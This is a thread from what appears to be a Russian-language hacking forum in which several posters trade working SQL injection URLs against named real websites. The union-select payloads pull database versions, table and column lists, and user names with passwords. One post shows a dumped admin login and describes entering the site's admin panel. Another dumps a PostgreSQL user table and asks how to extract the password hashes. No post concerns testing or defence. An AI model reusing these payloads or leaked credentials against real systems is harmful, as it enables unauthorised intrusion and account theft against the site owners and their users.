10.03.2008, 14:19
|
|
Reservists Of Antichat - Level 6
Регистрация: 04.02.2007
Сообщений: 1,152
С нами:
10139366
Репутация:
1502
|
|
ЦЕЛЬ:
Код:
http://www.fnm.msu.ru
УЯЗВИМОСТЬ: ГДЕ:
Код:
http://www.fnm.msu.ru/main.php?topic=1 and 1=1
ЭКРАНИРОВАНИЕ СПЕЦСИМВОЛОВ: ВЕРСИЯ MySQL:
Код:
5.0.24a-Debian_9-log
НАЛИЧИЕ INFORMATION_SCHEMA: ТАБЛИЦЫ:
Код:
CHARACTER_SETS
COLLATIONS
COLLATION_CHARACTER_SET_APPLICABILITY
COLUMNS
COLUMN_PRIVILEGES
KEY_COLUMN_USAGE
ROUTINES
SCHEMATA
SCHEMA_PRIVILEGES
STATISTICS
TABLES
TABLE_CONSTRAINTS
TABLE_PRIVILEGES
TRIGGERS
USER_PRIVILEGES
VIEWS
doc_folders
documents
indexim
sessions
subtopics
topics
users
А дальше - сами=)
__________________
Bedankt euch dafür bei euch selbst.
H_2(S^3/((z1, z2)~(exp(2pi*i/p)z1, exp(2pi*q*i/p)z2)))=Z/pZ
|
|
|
10.03.2008, 00:00
|
|
Участник форума
Регистрация: 08.11.2007
Сообщений: 102
С нами:
9740547
Репутация:
93
|
|
http://gol.sao.mos.ru/news_full.php?id=-1+union+select+1,2,aes_decrypt(aes_encrypt(concat( version(),0x3a,user(),0x3a,database()),0x71),0x71) ,4,5/*
вроде, не баян.
|
|
|
|
10.03.2008, 00:14
|
|
Познающий
Регистрация: 23.11.2006
Сообщений: 79
С нами:
10245237
Репутация:
66
|
|
Код HTML:
http://www.satdv.net.ru/index.php?option=com_simplefaq&task=answer&Itemid=9999&catid=9999&aid=-1/**/union/**/select/**/0,username,password,email,0,0,0,0,0,0,0,0,0,0,0,0,%20%200,0,0,0/**/from/**/jos_users/*
http://www.aloris.ru/http://www.tatshop.ru/index.php?option=com_simplefaq&task=answer&Itemid=9999&catid=9999&aid=-1/**/union/**/select/**/0,username,password,email,0,0,0,0,0,0,0,0,0,0,0,0,%20%200,0,0,0/**/from/**/jos_users/*
http://kneparhia.ru/index.php?option=com_simplefaq&task=answer&Itemid=9999&catid=9999&aid=-1/**/union/**/select/**/0,username,password,email,0,0,0,0,0,0,0,0,0,0,0,0,%20%200,0,0,0/**/from/**/jos_users/*
http://support.gateway.ru/index.php?option=com_simplefaq&task=answer&Itemid=9999&catid=9999&aid=-1/**/union/**/select/**/0,username,password,email,0,0,0,0,0,0,0,0,0,0,0,0,%20%200,0,0,0/**/from/**/jos_users/*
http://glasstable.ru/index.php?option=com_simplefaq&task=answer&Itemid=9999&catid=9999&aid=-1/**/union/**/select/**/0,username,password,email,0,0,0,0,0,0,0,0,0,0,0,0,%20%200,0,0,0/**/from/**/jos_users/*
|
|
|
|
10.03.2008, 13:13
|
|
Познающий
Регистрация: 26.01.2008
Сообщений: 71
С нами:
9626078
Репутация:
141
|
|
http://www.usms.org/articles/articledisplay.php?a=-150'+union+select+1,2,3,4,5,6,7,8,9/*
name=usms_main
dbver=5.0.27-standard
user=usms_rw@172.16.1.1
таблы так и не осилил  |
|
|
|
10.03.2008, 14:58
|
|
Участник форума
Регистрация: 08.11.2007
Сообщений: 102
С нами:
9740547
Репутация:
93
|
|
http://astrol.ru/index.php?page=-1+union+select+1,2,3,4,aes_decrypt(aes_encrypt(con cat(version(),0x3a,user(),0x3a,database()),0x71),0 x71),6,7/*
не баян (:
|
|
|
|
10.03.2008, 15:58
|
|
Участник форума
Регистрация: 06.11.2007
Сообщений: 143
С нами:
9742875
Репутация:
81
|
|
http://www.colan.ru/prices/level2n.php?id_group=99999999999999999+;+select+nu ll,version(),null,4,null,null,null,null,null,null, null,null,null,null,null,null,null,null--
PostgreSQL 7.4.7 on i386-portbld-freebsd5.3, compiled by GCC cc (GCC) 3.4.2 [FreeBSD] 20040728
http://www.colan.ru/prices/level2n.php?id_group=99999999999999999+;+select+1, TABLE_NAME,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,1 8+from+information_schema.tables+--
выводит много интересного, но я выбрал pg_user
http://www.colan.ru/prices/level2n.php?id_group=99999999999999999+;+select+nu ll,COLUMN_NAME,null,null,null,null,null,null,null, null,null,null,null,null,null,null,null,null+from+ information_schema.columns+where+table_name=(selec t+TABLE_NAME+from+information_schema.tables+limit+ 1+offset+43)--
результат:
usecatupd
usesuper
usecreatedb
usename
usesysid
passwd
valuntil
useconfig
http://www.colan.ru/prices/level2n.php?id_group=99999999999999999+;+select+nu ll,usename,null,null,null,null,null,null,null,null ,null,null,null,null,null,null,null,null+from+pg_u ser--
http://www.colan.ru/prices/level2n.php?id_group=99999999999999999+;+select+nu ll,passwd,null,null,null,null,null,null,null,null, null,null,null,null,null,null,null,null+from+pg_us er--
первый это админ
login: postgres
pass: ********
Так вот вопрос по существу как пароли то вытащить, я пробовал даже тип поля помнять с hide что-то не могу... разьве что e-mail сменить и воспользоваться воостановлением пароля....
|
|
|
|
10.03.2008, 16:25
|
|
Участник форума
Регистрация: 22.10.2007
Сообщений: 138
С нами:
9765139
Репутация:
177
|
|
www.tungus.ru
Код:
http://www.tungus.ru/views.php?id=791000+union+select+1,2,3,concat_ws(0x3a,user,pass),5,6,7,8+from+users/*
бугага, смотрим в свойтва рисунка
nitros911:ujkfz;jgf голаяжопа 
идем в админку
http://www.tungus.ru/admin.php правильно, и админим
куча обоев для рабочего стола скачать 250 мб
|
|
|
|
10.03.2008, 16:29
|
|
Участник форума
Регистрация: 06.11.2007
Сообщений: 143
С нами:
9742875
Репутация:
81
|
|
http://www.kalm.ru/ru/docs_view.php?id=-1+union+select+1,2,3,4,concat(version(),char(58),d atabase(),char(58),user()),6,7,8+--
4.0.16-log
kalm_ru
kalm@localhost
|
|
|
|
10.03.2008, 17:31
|
|
Banned
Регистрация: 06.01.2008
Сообщений: 413
С нами:
9655526
Репутация:
1334
|
|
http://www.iwdp.co.uk/profile.php?id=99999+union+select+1,VERSION(),3,4, 5,6,7,8,9,10,11/*
VERSION: 4.1.20
DATABASE: iwdp
USER: iwdp@localhost
http://www.eipcprograms.com/product.php?id=9999+union+select+1,VERSION(),3,4,5 ,6,7,8,9,10,11,12,13/*
VERSION: 5.0.24a-log
DATABASE: d60350056
USER: u70382875@cgihost
|
|
|
|
10.03.2008, 17:41
|
|
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
С нами:
9593606
Репутация:
4915
|
|
2 cash$$$
Два баяна
_http://forum.antichat.ru/showpost.php?p=594249&postcount=981
_http://forum.antichat.ru/showpost.php?p=577278&postcount=4680
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Комбинированный вид
